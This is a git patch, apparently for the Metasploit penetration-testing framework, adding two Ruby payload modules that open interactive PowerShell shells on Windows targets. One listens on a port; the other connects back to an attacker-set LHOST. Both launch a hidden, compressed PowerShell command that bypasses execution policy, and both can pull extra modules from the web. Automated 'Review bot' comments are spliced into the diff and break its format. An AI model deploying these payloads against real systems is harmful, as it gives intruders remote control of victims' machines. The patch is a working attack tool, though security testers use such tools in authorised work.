From a02ea90824d4c88a0310b067c078722e3b804550 Mon Sep 17 00:00:00 2001
From: benpturner
Date: Sat, 25 Apr 2015 16:49:22 +0100
Subject: [PATCH] New payloads which work with cmd
---
 .../singles/windows/powershell_bind_tcp.rb | 84 ++++++++++++++++++
 .../singles/windows/powershell_reverse_tcp.rb | 86 +++++++++++++++++++
 2 files changed, 170 insertions(+)
 create mode 100644 modules/payloads/singles/windows/powershell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/windows/powershell_reverse_tcp.rb
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
new file mode 100644
index 0000000000..2ecabe3f26
--- /dev/null
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec'
+require 'msf/base/sessions/powershell'
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+ CachedSize = 1455
+
+ include Msf::Payload::Windows::Exec
+ include Rex::Powershell::Command
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Windows Interactive Powershell Session, Bind TCP',
+ 'Description' => 'Listen for a connection and spawn an interactive powershell session',
+ 'Author' =>
+ [
+ 'Ben Turner', # benpturner
+ 'Dave Hardy' # davehardy20
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::PowerShell,
+ ))
+
+ # Register command execution options
+ register_options(
+ [
+ OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+ ], self.class)
+ # Hide the CMD option...this is kinda ugly
+ deregister_options('CMD')
+ end
+
+ #
+ # Override the exec command string
+ #
+ def command_string
+ lport = datastore['LPORT']
+
+ template_path = File.join(
+ Msf::Config.data_directory,
+ 'exploits',
+ 'powershell',
+ 'powerfun.ps1')
+
+ script_in = File.read(template_path)
+ script_in << "\npowerfun -Command bind"
+
+ mods = ''
+
+ if datastore['LOAD_MODULES']
+ mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+ mods_array.collect(&:strip)
+ print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+ mods_array.each {|m| vprint_good " #{m}"}
+ mods = "\"#{mods_array.join("\",\n\"")}\""
+ script_in << " -Download true\n"
+ end
+
+ script_in.gsub!('MODULES_REPLACE', mods)
+ script_in.gsub!('LPORT_REPLACE', lport.to_s)
+ # Base64 encode the compressed file contents
+ script = Rex::Powershell::Command.compress_script(script_in)
+ "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+
+ end
+end
+
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
new file mode 100644
index 0000000000..d13f65ad39
--- /dev/null
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
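Review bot: `mods_array.collect(&:strip)` discards its result, so the entries joined into the script a few lines later keep whatever whitespace surrounded the commas; build the stripped list directly, `mods_array = datastore['LOAD_MODULES'].to_s.split(',').map(&:strip)`, and drop the `collect` line. The identical line is in powershell_reverse_tcp.rb. Those entries are also spliced into the PowerShell source as bare double-quoted literals, so an entry containing `"` or `$` changes the generated script instead of being treated as data; rejecting such entries with an error at this point would keep the script well-formed. The file header comment `# Extends the Exec payload to add a new user.` is carried over from another module and does not describe this one; `# Spawns an interactive PowerShell session over a bind TCP connection.` would fit, and `seperated` in the LOAD_MODULES description should read `separated`.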
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec'
+require 'msf/base/sessions/powershell'
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+ CachedSize = 1439
+
+ include Msf::Payload::Windows::Exec
+ include Rex::Powershell::Command
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
+ 'Description' => 'Listen for a connection and spawn an interactive powershell session',
+ 'Author' =>
+ [
+ 'Ben Turner', # benpturner
+ 'Dave Hardy' # davehardy20
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::PowerShell,
+ ))
+
+ # Register command execution options
+ register_options(
+ [
+ OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+ ], self.class)
+ # Hide the CMD option...this is kinda ugly
+ deregister_options('CMD')
+ end
+
+ #
+ # Override the exec command string
+ #
+ def command_string
+ lport = datastore['LPORT']
+ lhost = datastore['LHOST']
+
+ template_path = File.join(
+ Msf::Config.data_directory,
+ 'exploits',
+ 'powershell',
+ 'powerfun.ps1')
+
+ script_in = File.read(template_path)
+ script_in << "\npowerfun -Command reverse"
+
+ mods = ''
+
+ if datastore['LOAD_MODULES']
+ mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+ mods_array.collect(&:strip)
+ print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+ mods_array.each {|m| vprint_good " #{m}"}
+ mods = "\"#{mods_array.join("\",\n\"")}\""
+ script_in << " -Download true\n"
+ end
+
+ script_in.gsub!('MODULES_REPLACE', mods)
+ script_in.gsub!('LPORT_REPLACE', lport.to_s)
+ script_in.gsub!('LHOST_REPLACE', lhost.to_s)
+ # Base64 encode the compressed file contents
+ script = Rex::Powershell::Command.compress_script(script_in)
+ "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+
+ end
+end
+
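Review bot: The `'Description'` string `'Listen for a connection and spawn an interactive powershell session'` is copied from the bind module, but this payload registers `Msf::Handler::ReverseTcp` and substitutes `LHOST_REPLACE`, so it connects out rather than listening; `'Description' => 'Connect back to the handler and spawn an interactive powershell session'` describes it. The header comment `# Extends the Exec payload to add a new user.` is likewise inherited text and should say that the module spawns an interactive PowerShell session over a reverse TCP connection. Apart from the handler, the `-Command reverse` argument and the extra `LHOST_REPLACE` substitution, `initialize` and `command_string` are line-for-line the same as in powershell_bind_tcp.rb; moving the shared parts into a mixin would keep the two modules from drifting when one of them is fixed.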